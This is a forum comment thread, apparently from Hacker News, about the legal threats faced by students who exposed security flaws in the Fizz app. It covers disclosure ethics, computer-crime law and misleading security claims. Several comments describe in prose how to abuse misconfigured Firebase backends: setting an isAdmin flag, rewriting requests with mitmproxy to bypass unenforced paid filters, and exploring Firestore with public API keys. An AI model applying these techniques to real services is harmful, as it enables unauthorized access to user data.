Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact than in the actual courts you are guilty of a crime.
This is still the way to go even in many western countries.
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
That's wild!
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statutes of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
So this is entirely on the dev team to blame.
You could also bypass the filter preventing searching for over 18 if you are under/under if you are over, and paid-only filters like location, gender, etc. by rewriting the requests with a mitmproxy (paid status is not checked server-side).
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
[1] https://github.com/iosiro/baserunner
[2] https://saligrama.io/blog/post/firebase-insecure-by-default/
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
https://web.archive.org/web/20220204044213/https://fizzsocia...
What I was looking for was if they really had a page that claimed "100% secure", but I don't think that was captured by archive.org
It's only legal to use the legal action, period. Once you pull in a THREAT, it becomes blackmail/extortion.
1. threatening violence is explicitly a crime
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
It absolutely can be illegal, in the case of extortion. If you say "do this or I turn you in" that's extortion.
Deleted Comment
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
Deleted Comment
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.